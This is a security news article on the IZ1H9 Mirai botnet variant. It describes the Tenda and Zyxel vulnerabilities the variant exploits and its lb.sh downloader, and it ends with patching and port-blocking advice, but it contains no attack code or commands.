A variant of the infamous Mirai botnet has been discovered that leverages four device vulnerabilities to add Linux-based servers and IoT devices to botnets that can conduct network-based attacks. The IZ1H9 variant was observed by Palo Alto Network’s Unit 42, which found it being used in an attack on 10 April. The botnet includes two command injection vulnerabilities, CVE-2023-27076 and CVE-2023-26801; two remote code execution flaws, CVE-2023-26802 and one without a CVE that affects Zyxel devices. Although the botnet seems focused on distributed denial of service attacks, the vulnerabilities could ultimately lead to remote code execution.
RCE is ranked high on the list of experiences that enterprises would rather avoid, and vulnerable devices are being completely compromised by attackers; often for a long period of time, eventually becoming persistent risks. Unit 42 researchers have observed IZ1H9 being controlled by one threat actor in more than one attack since November 2021. Still, the malware has been present in one format or another since 2018. Identification is supported by the identical malware shell script downloaders used in the incidents.
Researchers observed abnormal traffic to an organization’s threat-hunting system as attackers attempted to download and implement a shell script downloader lb.sh in an attack on 10 April. This downloader, if executed, deploys and executes a variety of bot clients to support different Linux architectures. The final step of the attack is to block network connections from several ports, including SSH, telnet, and HTTP — by modifying the device’s iptable rules.
Experts stressed that anyone with vulnerable devices in their infrastructure should update them with the latest software to apply any available patches to defend against Mirai variants. Organizations can also protect their networks with advanced firewall and threat protection that leverages machine learning to detect vulnerability exploits in real-time and advanced URL filtering and DNS security to block command-and-control domains and malware-hosting URLs.
Blocking ports 80 (HTTP), 22 (SSH), and 23 (TELNET) on devices that are public-facing should be a no-brainer to mitigate this type of attack. IoT device manufacturers often leave these ports open in devices right off the assembly line, and an international governing body is required to hold these manufacturers responsible.
Mirai Variant Can Exploit Tenda and Zyxel Devices for Remote Code Execution and DDoS Attacks
